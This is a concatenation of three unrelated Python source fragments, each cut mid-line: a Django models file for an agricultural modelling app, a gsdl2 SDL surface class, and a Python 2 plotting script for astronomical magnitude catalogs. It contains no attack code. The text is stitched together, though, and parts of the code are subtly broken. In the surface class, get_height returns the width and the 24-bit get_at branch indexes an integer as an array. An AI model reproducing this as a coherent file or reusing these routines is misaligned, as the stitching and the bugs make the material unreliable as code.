dense_tables_tooltip = "Use less spacing in tables to see more data on screen at the same time"
# set up the signal receivers that get triggered after a user is created so that everyone has a userprofile
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
new_profile = UserProfile.objects.create(user=instance)
assign_perm("change_userprofile", instance, new_profile)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
class Organization(models.Model):
"""
Since this application is designed to support multiple models, possibly in the same instance, make most things
be ties to an "organization" of some kind - we'll include users in the organization and arrange permissions
around users within the organization.
We could have made this a subclass of the Group object, but then reverse relationships may not work correctly.
Instead we'll just
"""
name = models.CharField(max_length=255, null=False, blank=False)
# TODO: This shouldn't allow nulls or blanks in the future
group = models.OneToOneField(Group, on_delete=models.DO_NOTHING, null=True, blank=True)
def has_member(self, user):
return self.group in user.groups.all() # True if this group is in that set, otherwise, False
def add_member(self, user):
self.group.user_set.add(user)
self.group.save()
def __str__(self):
return f"Organization: {self.name}"
class ModelArea(models.Model):
"""
This would be something like "The Delta", or "Washington" - mostly, this will be one to one with organizations,
but just in case we want to be able to deploy multiple models for an organization in the future, we'll store it
this way.
"""
organization = models.ForeignKey(Organization, null=True, blank=True, on_delete=models.SET_NULL, related_name="model_areas")
name = models.CharField(max_length=255, unique=True)
data_folder = models.CharField(max_length=255, default="dap") # which folder did the data for this come from during loading? Can
# help us if we want to update some data later
description = models.TextField(null=True, blank=True)
# preferences reverse 1 to 1
map_center_latitude = models.DecimalField(max_digits=4, decimal_places=2)
map_center_longitude = models.DecimalField(max_digits=5, decimal_places=2)
map_default_zoom = models.SmallIntegerField()
# these values define the ranges available when creating a model run in this region
min_water = models.PositiveSmallIntegerField(default=50)
max_water = models.PositiveSmallIntegerField(default=120)
min_rainfall = models.PositiveSmallIntegerField(default=10)
max_rainfall = models.PositiveSmallIntegerField(default=200)
min_land = models.PositiveSmallIntegerField(default=50)
max_land = models.PositiveSmallIntegerField(default=100)
min_price = models.PositiveSmallIntegerField(default=80)
max_price = models.PositiveSmallIntegerField(default=120)
min_yield = models.PositiveSmallIntegerField(default=80)
max_yield = models.PositiveSmallIntegerField(default=120)
min_crop_area = models.PositiveSmallIntegerField(default=0)
max_crop_area = models.PositiveSmallIntegerField(default=200)
main_help_page_content = models.TextField(null=True, blank=True)
feature_package_name = models.CharField(max_length=100, default="DEFAULT")
def __str__(self):
return self.name
@property
def model_defaults(self):
# Just making it a dict so that it comes out of the serializer grouped
return {
"min_water": self.min_water,
"max_water": self.max_water,
"min_rainfall": self.min_rainfall,
"max_rainfall": self.max_rainfall,
"min_land": self.min_land,
"max_land": self.max_land,
"min_price": self.min_price,
"max_price": self.max_price,
"min_yield": self.min_yield,
"max_yield": self.max_yield,
"min_crop_area": self.min_crop_area,
"max_crop_area": self.max_crop_area,
}
# elasticities code commented out because we don't run calibration
# ourselves right now
#@property
#def elasticities_as_dict(self):
# return {item.crop.crop_code: float(item.value) for item in self.elasticities}
@property
def supports_rainfall(self):
return self.region_set.filter(supports_rainfall=True).exists()
@property
def supports_irrigation(self):
return self.region_set.filter(supports_irrigation=True).exists()
@property
def background_code(self):
# this is a bit of a hack, but we're using the folder
# names as a class to set the backgrounds temporarily
return self.data_folder
class ModelAreaPreferences(models.Model):
"""
This model is so that we can group preferences and features for model areas
and keep them organized
"""
# should all users of this model area be able to see the model runs of all other users?
shared_model_runs = models.BooleanField(default=True)
# prevent users from reducing price/yield below the value that would make profits negative
# basically forces stormchaser to create cards for crops when All Crops
# goes to negative profits for the crop
enforce_price_yield_constraints = models.BooleanField(default=True)
# if True, and the user makes an adjustment that would create
# negative profits, it forces the slider they weren't using upward as they move the other
# downward. If False, it's purely advisory
lock_price_yield_ratio = models.BooleanField(default=False)
# Should visualizations and downloads include net revenues for this model area? By default we
# don't want to - in most cases, it won't be something we want people to see - but we'll want
# it to be able to be accessed for debugging purposes
include_net_revenue = models.BooleanField(default=False)
# should region-linking of crops be enabled?
region_linked_crops = models.BooleanField(default=False)
# whether or not to show the ability to view model run creation code
allow_model_run_creation_code_view = models.BooleanField(default=False)
# flags to indicate an entire set of features in data visualization
# where they can choose additional model runs for comparison,
# can normalize to a base run, and can see worst case outcomes
allow_viz_multiple_comparisons = models.BooleanField(default=False)
allow_viz_normalization = models.BooleanField(default=False)
allow_viz_region_filter = models.BooleanField(default=False)
allow_viz_worst_case = models.BooleanField(default=False)
allow_static_regions = models.BooleanField(default=False)
allow_removed_regions = models.BooleanField(default=False)
allow_linear_scaled_regions = models.BooleanField(default=False)
use_default_region_behaviors = models.BooleanField(default=True)
model_area = models.OneToOneField(ModelArea,
on_delete=models.CASCADE,
related_name="preferences"
)
# set up the signal receivers that get triggered after a model area is created so that everyone has a userprofile
@receiver(post_save, sender=ModelArea)
def create_model_area_preferences(sender, instance, created, **kwargs):
if created:
ModelAreaPreferences.objects.create(model_area=instance)
@receiver(post_save, sender=ModelArea)
def save_model_area(sender, instance, **kwargs):
instance.preferences.save()
#class Elasticity(models.Model):
# elasticities code commented out because we don't run calibration
# ourselves right now
# """
# We store elasticities for Dapper as individual records here,
# but we'll access them on the ModelArea object to send to Dapper
# """
# model_area = models.ForeignKey(ModelArea, on_delete=models.CASCADE, related_name="elasticities")
# crop = models.ForeignKey("Crop", on_delete=models.CASCADE, related_name="elasticities")
# value = models.DecimalField(max_digits=6, decimal_places=4)
class RegionGroup(models.Model):
name = models.CharField(max_length=255, null=False, blank=False)
internal_id = models.CharField(max_length=100, null=False, blank=False) # typically we have some kind of known ID to feed to a model that means something to people
model_area = models.ForeignKey(ModelArea, on_delete=models.CASCADE)
geometry = models.JSONField(null=True, blank=True) # this will just store GeoJSON and then we'll combine into collections manually
class Region(models.Model):
MODELED = 0
REMOVED = 1
FIXED = 2
LINEAR_SCALED = 3
REGION_DEFAULT_MODELING_CHOICES = (
(MODELED, "Modeled"),
(REMOVED, "Removed"),
(FIXED, "Fixed"),
(LINEAR_SCALED, "Linear Scaled"),
)
class Meta:
unique_together = ['name', 'model_area']
indexes = [
models.Index(fields=("internal_id",)),
models.Index(fields=("model_area_id", "supports_rainfall",)), # we'll use these to set an attribute whenever someone loads a model area
models.Index(fields=("model_area_id", "supports_irrigation",))
]
name = models.CharField(max_length=255, null=False, blank=False)
internal_id = models.CharField(max_length=100, null=False, blank=False) # typically we have some kind of known ID to feed to a model that means something to people
external_id = models.CharField(max_length=100, null=True, blank=True) # a common external identifier of some kind
description = models.TextField(null=True, blank=True)
# .extra_attributes reverse lookup
# .modifications reverse lookup
default_behavior = models.SmallIntegerField(default=MODELED, choices=REGION_DEFAULT_MODELING_CHOICES)
geometry = models.JSONField(null=True, blank=True) # this will just store GeoJSON and then we'll combine into collections manually
model_area = models.ForeignKey(ModelArea, on_delete=models.CASCADE)
group = models.ForeignKey(RegionGroup, null=True, blank=True, on_delete=models.CASCADE) # there could be a reason to make it a many to many instead, but
# I can't think of a use case right now, and it'd require some PITA
# logic to tease apart specifications for regions in overlapping groups
supports_rainfall = models.BooleanField(default=False) # whether or not this region has any rainfall/dryland components
supports_irrigation = models.BooleanField(default=True) # whether or not this region has any irrigated components
serializer_fields = ("id", "name", "internal_id", "description", "geometry", "model_area", "group",
"supports_rainfall", "supports_irrigation", "multipliers", "default_behavior",
"MODELED", "FIXED", "REMOVED", "LINEAR_SCALED")
def __str__(self):
return "Area {}: Region {}".format(self.model_area.name, self.name)
class RegionMultipliers(models.Model):
region = models.OneToOneField(Region, on_delete=models.CASCADE, related_name="multipliers")
total_revenue = models.DecimalField(max_digits=10, decimal_places=8, null=True, blank=True)
direct_value_add = models.DecimalField(max_digits=10, decimal_places=8, null=True, blank=True)
total_value_add = models.DecimalField(max_digits=10, decimal_places=8, null=True, blank=True)
direct_jobs = models.DecimalField(max_digits=10, decimal_places=8, null=True, blank=True)
total_jobs = models.DecimalField(max_digits=10, decimal_places=8, null=True, blank=True)
class RegionExtra(models.Model):
"""
Extra custom attributes that can be set per region instance, available by filtering
`region.extra_attributes.filter(name == "{attribute_name}")`, for example.
"""
region = models.ForeignKey(Region, on_delete=models.CASCADE, related_name="extra_attributes")
name = models.CharField(max_length=255, null=False, blank=False)
value = models.TextField(null=True, blank=True)
data_type = models.CharField(max_length=5) # indicates the Python data type to cast it to if it's not a string
class Crop(models.Model):
"""
A single unit for individual crops - note that we need to pull crops by organization - the same crop could
exist for multiple organizations. We don't want to load them in for all organizations because then we have to
worry about if it means the same exact thing across organizations, and what do changes mean to each group, etc,
etc. Let's keep it a known, manageable level of complex and assign crops to organizations even if it means
duplicating crops between organizations.
"""
class Meta:
unique_together = ['crop_code', 'model_area']
indexes = [
models.Index(fields=("name",))
]
name = models.CharField(max_length=255, null=False, blank=False) # human readable crop name
crop_code = models.CharField(max_length=30, null=False, blank=False) # code used in the models (like ALFAL for Alfalfa)
model_area = models.ForeignKey(ModelArea, on_delete=models.CASCADE) # clear any crops for | |
<reponame>TiberiumN/gsdl2<filename>gsdl2/surface.py
# TODO: __all__ = []
from collections import namedtuple
import logging
from gsdl2 import sdl, ffi
from gsdl2.sdlconstants import get_sdl_byteorder
from gsdl2.sdlconstants import SDL_BYTEORDER, SDL_LIL_ENDIAN, SDL_BIG_ENDIAN, SDL_MUSTLOCK
from gsdl2 import sdlpixels, SDLError
from gsdl2.rect import Rect, sdl_rect_from_rect, game_rect_from_obj
from gsdl2.locals import palette_8bit, Color
from gsdl2.surflock import locked
PixelFormat = namedtuple('PixelFormat', 'format palette bitsperpixel bytesperpixel' +
' rmask gmask bmask amask rloss gloss bloss aloss rshift gshift bshift ashift refcount next')
PixelPalette = namedtuple('PixelPalette', 'ncolors color')
# Color = namedtuple('Color', 'r g b a')
class Surface(object):
__src_rect = Rect(0, 0, 1, 1)
__dst_rect = Rect(0, 0, 1, 1)
def __init__(self, size_or_surf, flags=0, depth=0, masks=None, surface=None):
if depth == 0:
depth = 32
if not masks:
masks = [0] * 4
do_blit = False
if isinstance(size_or_surf, Surface):
surf = size_or_surf
width, height = surf.get_size()
flags = surf.get_flags()
depth = surf.get_bitsize()
self._sdl_surface = sdl.createRGBSurface(flags, width, height, depth, *masks)
do_blit = True
else:
if surface is None:
# some weird stuff
width, height = [int(val) for val in size_or_surf]
self._sdl_surface = sdl.createRGBSurface(flags, width, height, depth, *masks)
else:
self._sdl_surface = surface
if depth == 8:
palette_colors = sdl.ffi.cast('SDL_Color *', self._sdl_surface.format.palette.colors)
for i in range(256):
c = palette_colors[i]
c.r, c.g, c.b, c.a = palette_8bit[i]
if do_blit:
self.blit(size_or_surf, (0, 0))
def get_size(self):
surf = self._sdl_surface
return surf.w, surf.h
size = property(get_size)
def get_width(self):
return self._sdl_surface.w
width = property(get_width)
w = width
def get_height(self):
return self._sdl_surface.w
height = property(get_height)
h = height
def get_flags(self):
return self._sdl_surface.flags
flags = property(get_flags)
def get_masks(self):
f = self._sdl_surface.format
return f.Rmask, f.Gmask, f.Bmask, f.Amask
masks = property(get_masks)
def get_bitsize(self):
return self._sdl_surface.format.BitsPerPixel
bitsize = property(get_bitsize)
def get_colorkey(self):
surface = self._sdl_surface
c = Color(0, 0, 0, 0)
sdl.getColorKey(surface, c.sdl_color)
return c
def set_colorkey(self, color, flag=1):
"""set flag=1 to enable, flag=0 to disable"""
surface = self._sdl_surface
map_color = sdl.mapRGBA if len(color) == 4 else sdl.mapRGB
sdl.setColorKey(surface, flag, map_color(surface.format, *color))
colorkey = property(get_colorkey, set_colorkey)
def get_blendmode(self):
cdata = sdl.ffi.new('SDL_BlendMode *')
sdl.getTextureBlendMode(self.sdl_surface, cdata)
value = int(cdata[0])
return value
def set_blendmode(self, mode):
sdl.setTextureBlendMode(self.sdl_surface, mode)
blendmode = property(get_blendmode, set_blendmode)
def get_rect(self, **kwargs):
"""get_rect(rect=outrect, **{setattrs}) -> Rect
If a rect is provided, its values are updated and it is returned. If rect is not provided, a new one will be
constructed. The remaining kwargs are rect attributes to set.
:param kwargs: rect=outrect, x=N, y=N, center=(X, Y), etc.
:return:
"""
if 'rect' in kwargs:
r = kwargs['rect']
else:
w, h = self.get_size()
r = Rect(0, 0, w, h)
for k, v in kwargs.items():
setattr(r, k, v)
return r
def get_abs_offset(self):
""" get_abs_offset() -> (x, y)
find the absolute position of a child subsurface inside its top level parent
"""
if False:
# FIXME: Implement this
subsurf = None
owner = subsurf.owner
offsetx, offsety = subsurf.xoffset, subsurf.yoffset
while owner.subsurfacedata:
subsurf = owner.subsurfacedata
owner = subsurf.owner
offsetx += subsurf.xoffset
offsety += subsurf.yoffset
return (offsetx, offsety)
return (0, 0)
def get_bounding_rect(self, min_alpha=1):
""" get_bounding_rect(min_alpha = 1) -> Rect
find the smallest rect containing data
"""
min_alpha = int(min_alpha)
if min_alpha > 255:
min_alpha = 255
elif min_alpha < 0:
min_alpha = 0
r, g, b, a = (ffi.new('uint8_t *'), ffi.new('uint8_t *'),
ffi.new('uint8_t *'), ffi.new('uint8_t *'))
format = self.sdl_surface.format
if self.sdl_surface.flags & sdl.TRUE:
keyr = ffi.new('uint8_t *')
keyg = ffi.new('uint8_t *')
keyb = ffi.new('uint8_t *')
try:
sdl.getRGBA(format.colorkey,
format, keyr, keyg, keyb, a)
keyr, keyg, keyb = keyr[0], keyg[0], keyb[0]
except:
pass
else:
keyr = keyg = keyb = None
min_x, min_y, max_x, max_y = 0, 0, self.w, self.h
def check_alpha(x, y):
value = self.get_at((x,y))
sdl.getRGBA(value, format, r, g, b, a)
if (keyr is None and a[0] >= min_alpha) or \
(keyr is not None and (r[0] != keyr or
g[0] != keyg or
b[0] != keyb)):
return True
return False
with locked(self.sdl_surface):
found_alpha = False
for y in range(max_y - 1, -1, -1):
for x in range(min_x, max_x):
found_alpha = check_alpha(x, y)
if found_alpha:
break
if found_alpha:
break
max_y = y
found_alpha = False
for x in range(max_x - 1, -1, -1):
for y in range(min_y, max_y):
found_alpha = check_alpha(x, y)
if found_alpha:
break
if found_alpha:
break
max_x = x
found_alpha = False
for y in range(min_y, max_y):
min_y = y
for x in range(min_x, max_x):
found_alpha = check_alpha(x, y)
if found_alpha:
break
if found_alpha:
break
found_alpha = False
for x in range(min_x, max_x):
min_x = x
for y in range(min_y, max_y):
found_alpha = check_alpha(x, y)
if found_alpha:
break
if found_alpha:
break
return Rect._from4(min_x, min_y, max_x - min_x, max_y - min_y)
def get_at(self, pos):
# TODO; I think this is causing random segfaults
x, y = pos
surf = self._sdl_surface
format = surf.format
bpp = format.BytesPerPixel
pixels = surf.pixels
rgba = sdl.ffi.new('Uint8 [4]')
if SDL_MUSTLOCK(surf):
if not self.lock():
return
# TODO: not well tested
if bpp == 1:
pixels = sdl.ffi.cast('Uint8 *', pixels)
color_ = pixels[y * surf.w + x]
elif bpp == 2:
pixels = sdl.ffi.cast('Uint16 *', pixels)
color_ = pixels[y * surf.w + x]
elif bpp == 3:
pixels = sdl.ffi.cast('Uint8 *', pixels)
pix = pixels[(y * surf.w + x) * 3]
if SDL_BYTEORDER == SDL_LIL_ENDIAN:
color_ = pix[0] + pix[1] << 8 + pix[2] << 16
else:
color_ = pix[2] + pix[1] << 8 + pix[0] << 16
else: # bpp == 4
pixels = sdl.ffi.cast('Uint32 *', pixels)
color_ = pixels[y * surf.w + x]
self.unlock()
sdl.getRGBA(color_, format, rgba, rgba + 1, rgba + 2, rgba + 3)
# TODO: return tuple instead?
return Color(*rgba)
def set_at(self, pos, color_):
x, y = pos
surf = self._sdl_surface
pixels = surf.pixels
surf_format = surf.format
bpp = surf_format.BytesPerPixel
if not isinstance(color_, Color):
color_ = Color(*color_)
if (x < surf.clip_rect.x or x >= surf.clip_rect.x + surf.clip_rect.w or
y < surf.clip_rect.y or y >= surf.clip_rect.y + surf.clip_rect.h):
# out of clip area
return
if SDL_MUSTLOCK(surf):
if not self.lock():
return
c = sdl.mapRGBA(surf_format, color_.r, color_.g, color_.b, color_.a)
if bpp == 1:
buf = sdl.ffi.cast('Uint8 *', pixels)
buf[y * surf.w + x] = c
elif bpp == 2:
buf = sdl.ffi.cast('Uint16 *', pixels)
buf[y * surf.w + x] = c
elif bpp == 3:
# TODO: test 24 bit
buf = sdl.ffi.cast('Uint8 *', pixels)
rgb = sdl.ffi.new('Uint8 [4]')
color = sdl.ffi.cast('Uint32 *', color_.sdl_color)
sdl.getRGB(color[0], surf.format, rgb, rgb + 1, rgb + 2)
byte_buf = buf + y * surf.pitch + x * 3
if SDL_BYTEORDER == SDL_BIG_ENDIAN:
byte_buf[0] = rgb[0]
byte_buf[1] = rgb[1]
byte_buf[2] = rgb[2]
else:
byte_buf[2] = rgb[0]
byte_buf[1] = rgb[1]
byte_buf[0] = rgb[2]
else: # bpp == 4
buf = sdl.ffi.cast('Uint32 *', pixels)
buf[y * surf.w + x] = c
self.unlock()
def fill(self, color, rect=None, special_flags=0):
surface = self._sdl_surface
map_color = sdl.mapRGBA if len(color) == 4 else sdl.mapRGB
if SDL_MUSTLOCK(surface):
self.lock()
if rect is None:
size = self.get_size()
self.__src_rect[:] = 0, 0, size[0], size[1]
# rect = Rect(0, 0, size[0], size[1])
rect = self.__src_rect
elif not isinstance(rect, Rect):
# rect = Rect(*rect)
self.__src_rect[:] = rect
rect = self.__src_rect
rect = sdl_rect_from_rect(rect)
sdl.fillRect(surface, rect, map_color(surface.format, *color))
self.unlock()
# return Rect() # rather a tuple?
def blit(self, source, dest_rect, area=None, special_flags=0):
dest_surface = self._sdl_surface
if SDL_MUSTLOCK(dest_surface):
self.lock()
if area is None:
size = source.get_size()
# area = Rect(0, 0, int(size[0]), int(size[1]))
area = self.__src_rect
area[:] = 0, 0, size[0], size[1]
elif not isinstance(area, Rect):
# area = Rect(*area)
self.__src_rect[:] = area
area = self.__src_rect
if not isinstance(dest_rect, Rect):
# dest_rect = Rect(dest_rect)
size = source.get_size()
d = self.__dst_rect
d.topleft = dest_rect[0:2]
d.size = size
dest_rect = d
area = sdl_rect_from_rect(area)
dest_rect = sdl_rect_from_rect(dest_rect)
sdl.upperBlit(source.sdl_surface, area, dest_surface, dest_rect)
self.unlock()
def blit_scaled(self, source, dest_rect, area=None):
dest_surface = self._sdl_surface
if SDL_MUSTLOCK(dest_surface):
self.lock()
if area is None:
size = source.get_size()
area = self.__src_rect
area[:] = 0, 0, int(size[0]), int(size[1])
elif not isinstance(area, Rect):
self.__src_rect[:] = area
area = self.__src_rect
sdl_dest_rect = self.__dst_rect.sdl_rect
x, y, w, h = [int(n) for n in dest_rect]
# The following adjustment is intended to prevent jiggling which occurs when the size is an odd unit.
if w % 2:
x -= | |
linestyle=':')
### Values to plot ###
deltam, hax_mag, bins = normalize_plot(norm_delta_mag_list=norm_dm_list, bins=bins, hax_mag_list=hax_mag_list)
# Labels and appearance #
plt.ylabel('('+str(mag_axlabel1) + ' - ' + str(mag_axlabel2)+') / '+ '$\sigma$', fontsize=8)
### For scatter plot ###
if NORMALIZE is False:
# Values to plot #
deltam = np.array(clean_magnitude1) - np.array(clean_magnitude2)
if SWAP_HAX:
hax_mag = clean_magnitude2
if SWAP_HAX is False:
hax_mag = clean_magnitude1
# Labels and appearance #
plt.ylabel(str(mag_axlabel1) + ' - ' + str(mag_axlabel2), fontsize=9)
### 1-sigma curve ###
if PLOT_1SIG:
hax, vax, err, bins = bin_and_cut_measured_magnitude_error(error1=error1, error2=error2, clean_magnitude1=clean_magnitude1, clean_magnitude2=clean_magnitude2, filter_name=filter_name)[:4]
### Remove zeros from x, y, and err (zeros were placeholders for instances in which there were no objects in a particular magnitude bin) ###
err[:] = [temp for temp in err if temp is not None]
hax[:] = [temp for temp in hax if temp is not None]
vax[:] = [temp for temp in vax if temp is not None]
### Plot 1-sigma curve ###
plt.plot(hax, np.array(vax) + np.array(err), color='red', linestyle='-', linewidth=0.7, label='$1 \sigma_{mag\_meas}$')
plt.plot(hax, np.array(vax) - np.array(err), color='red', linestyle='-', linewidth=0.7)
### Write to log files to record the number of objects plotted and the number of objects within 1sigma ###
logger(delta_mag=deltam, filter_name=filter_name, clean_magnitude1=clean_magnitude1, full_magnitude1=full_magnitude1, realization_number=realization_number, tile_name=tile_name, bins=bins, hax_mag=hax_mag)
if PRINTOUTS:
print 'Plotting ', len(clean_magnitude1), ' objects ... \n'
### Plot ###
# One colorbar at a time. This error is caught at beginning of script #
if CM_T_S2N_COLORBAR is False and BIN_CM_T_S2N is False and CM_T_COLORBAR is False and CM_T_ERR_COLORBAR is False:
plt.scatter(hax_mag, deltam, color=get_color(filter_name=filter_name)[0], alpha=0.25, s=0.25)
if CM_T_S2N_COLORBAR or CM_T_ERR_COLORBAR or CM_T_COLORBAR:
'''To plot only the worst (smallest) s2n ratio:
plt.scatter(np.array(hax_mag)[idx_list[0]], np.array(deltam)[idx_list[0]], color='purple', alpha=1, s=1, label='%1.f'%bins[0]+'<cm_T_s2n<%1.f'%bins[1])
'''
plt.scatter(hax_mag, deltam, c=cbar_val, alpha=0.25, s=0.25, norm=matplotlib.colors.LogNorm(), cmap='gist_rainbow')
plt.colorbar(label=cbar_axlabel)
if BIN_CM_T_S2N:
colors = ['green', 'purple', 'cyan', 'orange', 'pink', 'yellow', 'black', 'blue']
for i in np.arange(0, len(idx_list)):
plt.scatter(np.array(hax_mag)[idx_list[i]], np.array(deltam)[idx_list[i]], color=colors[i], alpha=0.25, s=0.25, label='%1.f'%bins[i]+'<cm_T_s2n<%1.f'%bins[i+1])
if HEXBIN:
if NORMALIZE:
grid = (100, 1000)
if PRINTOUTS:
print ' Normalized hexbin has a large number of grid cells. Will take a moment to plot ... \n'
if NORMALIZE is False:
grid = 100
plt.hexbin(hax_mag, deltam, gridsize=grid, cmap=get_color(filter_name=filter_name)[1], bins='log')
plt.colorbar(label='log(counts)')
# Labels and appearance #
if SWAP_HAX:
plt.xlabel(str(mag_axlabel2), fontsize=9)
if SWAP_HAX is False:
plt.xlabel(str(mag_axlabel1), fontsize=9)
plt.axhline(y=0.0, color='k', linestyle=':', linewidth=0.5)
if YLOW is not None and YHIGH is not None:
plt.ylim([YLOW, YHIGH])
### Plot legend ###
if PLOT_1SIG and BIN_CM_T_S2N is False:
plt.legend(fontsize=8).draggable()
if BIN_CM_T_S2N:
# Increase marker size and opacity in legend #
lgnd = plt.legend(markerscale=4, fontsize=8)
for l in lgnd.legendHandles:
l.set_alpha(1)
if SUBPLOT is False:
plot_name = plot_name.replace('griz', filter_name)
### Save plot ###
if SAVE_PLOT:
print '-----> Saving plot as: ', plot_name
plt.savefig(plot_name)
if SHOW_PLOT:
plt.title(plot_title)
plt.show()
return 0
def subplotter(df, flag_idx, mag_hdr1, mag_hdr2, mag_err_hdr1, mag_err_hdr2, plot_name, plot_title, realization_number, tile_name):
"""Combine four subplots into a single plot with four panels (2-by-2). Declare variables needed for plotting.
Args:
*_hdr (str) -- Headers refer to columns in the matched catalog.
df (pandas DataFrame)
plot_name (str) -- Path and name for the plot. Used when save_plot is True and normalize is False.
realization_number (int) -- Allowed values: 0 1 2 None. Refers to Balrog injection and None refers to a one-realization run.
Returns:
flag_idx (list of ints) -- If log_flags is True, will check for all nonzero flag values in `FLAG_HDR_LIST` and `flag_idx` will contain indices that have nonzero flag values. Will be empty if LOG_FLAGS is False.
"""
# Counter for flag type() printout #
counter_flag_type_printout = 0
### Create 4-by-4 subplot ###
counter_subplot = 1
# Figure size units: inches #
plt.figure(figsize=(10, 8))
### Create one subplot for each griz filter ###
for f in ALL_FILTERS:
### Define variables ###
cbar_val, cbar_idx_list, cbar_bins, err1, err2, cleanmag1, cleanmag2, index_good, cbar_axlabel, fullmag1, mag_axlabel1, mag_axlabel2 = get_plot_variables(filter_name=f, df=df, mag_hdr1=mag_hdr1, mag_hdr2=mag_hdr2, mag_err_hdr1=mag_err_hdr1, mag_err_hdr2=mag_err_hdr2, realization_number=realization_number, tile_name=tile_name, mag_axlabel1=M_AXLABEL1, mag_axlabel2=M_AXLABEL2)
### Subplot ###
if SUBPLOT:
plt.subplot(2, 2, counter_subplot)
plotter(mag_hdr1=mag_hdr1, mag_hdr2=mag_hdr2, cbar_val=cbar_val, plot_title=plot_title, error1=err1, error2=err2, filter_name=f, full_magnitude1=fullmag1, clean_magnitude1=cleanmag1, clean_magnitude2=cleanmag2, mag_axlabel1=mag_axlabel1, mag_axlabel2=mag_axlabel2, realization_number=realization_number, tile_name=tile_name, idx_list=cbar_idx_list, bins=cbar_bins, cbar_axlabel=cbar_axlabel, plot_name=plot_name)
counter_subplot += 1
if SUBPLOT:
### Show or save the plot once all four subplots have been filled ###
plt.subplots_adjust(hspace=0.4)
plt.subplots_adjust(wspace=0.3)
plt.tight_layout(pad=3, h_pad=2.5)
### Title ###
plt.suptitle(plot_title)
### Save plot ###
if SAVE_PLOT:
print '-----> Saving plot as: ', plot_name
plt.savefig(plot_name)
### Show plot ###
if SHOW_PLOT:
plt.show()
return flag_idx
def get_plot_suptitle(realization_number, tile_name):
"""Generate plot title.
Args:
match_type (str) -- Ex: inj_mof_vs_truth_cat
realization_number (str) -- Allowed values: '0' '1' '2' ... 'stacked'.
tile_name (str)
Returns:
title (str) -- Ex: 'Inj MOF Cat & Truth Cat'
"""
title = str(TITLE_PIECE1) + ' & ' + str(TITLE_PIECE2) +'. Tile: ' + str(tile_name) + '. Realization: ' + str(realization_number) + '.'
if RUN_TYPE == 'ok':
title = title + ' Unchanged FOF groups.'
if RUN_TYPE == 'rerun':
title = title + ' Changed FOF groups.'
if NORMALIZE:
title = 'Normalized. ' + title
return title
def get_plot_save_name(realization_number, tile_name):
"""Generate name of the plot that will be used in plt.savefig().
Relies on directory structure: outdir/plots/`BALROG_RUN`/`MATCH_TYPE`/{tile}/{plot_type}/{realization}/ where allowed values for plot_type are: 'normalized' 'scatter'.
Args:
outdir (str) -- Output directory
realization_number (str) -- Allowed values: '0' '1' '2' 'stacked'
tile_name (str)
Returns:
fn (str) -- The complete filename which includes path.
"""
### Get filename ###
if YLOW is None and YHIGH is None:
# Default scale for the vertical axis (vax) is used #
ylim = 'defaultvax'
if YLOW is not None and YHIGH is not None:
ylim = str(YLOW)+'y'+str(YHIGH)
if RUN_TYPE is None:
endname = str(tile_name) + '_' + str(realization_number) + '_griz_' + str(MATCH_TYPE) + '_' + str(ylim) + '.png'
if RUN_TYPE is not None:
endname = str(tile_name) + '_' + str(realization_number) + '_griz_' + str(MATCH_TYPE) + '_' + str(RUN_TYPE) + '_' + str(ylim) + '.png'
# dm = delta magnitude #
if CM_T_S2N_COLORBAR:
outname = 'm_vs_dm_cm_t_s2n_' + endname
if CM_T_COLORBAR:
outname = 'm_vs_dm_cm_t_' + endname
if CM_T_ERR_COLORBAR:
outname = 'm_vs_dm_cm_t_err_' + endname
if HEXBIN:
outname = 'm_vs_dm_hexbin_' + endname
if CM_T_S2N_COLORBAR is False and CM_T_COLORBAR is False and CM_T_ERR_COLORBAR is False and HEXBIN is False:
outname = 'm_vs_dm_' + endname
# !!!!! User may wish to edit directory structure #
### Check for directory existence ###
if RUN_TYPE is not None:
plot_dir_pref = os.path.join(OUTDIR, 'plots', BALROG_RUN, MATCH_TYPE, tile_name, realization_number, 'fof_analysis')
if RUN_TYPE is None:
plot_dir_pref = os.path.join(OUTDIR, 'plots', BALROG_RUN, MATCH_TYPE, tile_name, realization_number)
if NORMALIZE:
plot_dir = os.path.join(plot_dir_pref, 'normalized')
if NORMALIZE is False:
plot_dir = os.path.join(plot_dir_pref, 'scatter')
if os.path.isdir(plot_dir) is False:
if NO_DIR_EXIT:
sys.exit('Directory ' + str(plot_dir) + ' does not exist. \n Change directory structure in ms_plotter.get_plot_save_name() or set `NO_DIR_MAKE=True`')
if NO_DIR_MAKE:
print 'Making directory ', plot_dir, '...\n'
os.makedirs(plot_dir)
### Get filename and path ###
if NORMALIZE:
fn = os.path.join(plot_dir, 'norm_' + str(outname))
if NORMALIZE is False:
fn = os.path.join(plot_dir, outname)
return fn
def get_coadd_mag_and_mag_err(fn_g, fn_r, fn_i, fn_z, mag_hdr, err_hdr):
"""Solely for use with coadd catalogs. Creates a list of magnitudes of form '(mag_g, mag_r, mag_i, mag_z)' from four catalogs.
Args:
fn -- Filenames. Must be FITS files.
hdr (str) -- Header for the magnitude. Headers refer to columns in the matched catalog.
Returns:
m_griz (list of str) -- Stores magnitude of each filter in form '(mag_g, mag_r, mag_i, mag_z)'
m_err_griz (list of str) -- Stores error in magnitude of each filter in form '(mag_g, mag_r, mag_i, mag_z)'
"""
# Files have not yet been matched, and do not have hdr_1 #
mag_hdr = mag_hdr[:-2]
err_hdr = err_hdr[:-2]
# Open FITS files #
hdu_g = fits.open(fn_g); hdu_r = fits.open(fn_r); hdu_i = fits.open(fn_i); hdu_z = fits.open(fn_z)
# Read data #
data_g = hdu_g[1].data; data_r = hdu_r[1].data; data_i = hdu_i[1].data; data_z = hdu_z[1].data
# Get magnitudes #
m_g = data_g[mag_hdr]; m_r = data_r[mag_hdr]; m_i = data_i[mag_hdr]; m_z = data_z[mag_hdr]
# Get magnitude errors #
err_g = data_g[err_hdr]; err_r = data_r[err_hdr]; err_i = data_i[err_hdr]; err_z = data_z[err_hdr]
m_griz, m_err_griz = [], []
for i in np.arange(0, len(m_g)):
m_griz.append("'("+ str(m_g[i]) + ', ' + str(m_r[i]) + ', ' + str(m_i[i]) + ', ' + str(m_z[i]) + ")'")
m_err_griz.append("'("+ str(err_g[i])+ ', ' + str(err_r[i])+ ', ' + str(err_i[i]) + ', ' + str(err_z[i]) + ")'")
return m_griz, m_err_griz
def get_star_mag(df):
"""Solely for use with star truth catalogs. Computes and creates a list of magnitudes of form '(mag_g, mag_r, mag_i, mag_z)'.
Args:
df (pandas DataFram)
Returns:
m_griz (list of str) -- Stores magnitudes of each filter in form '(mag_g, mag_r, mag_i, mag_z)'.
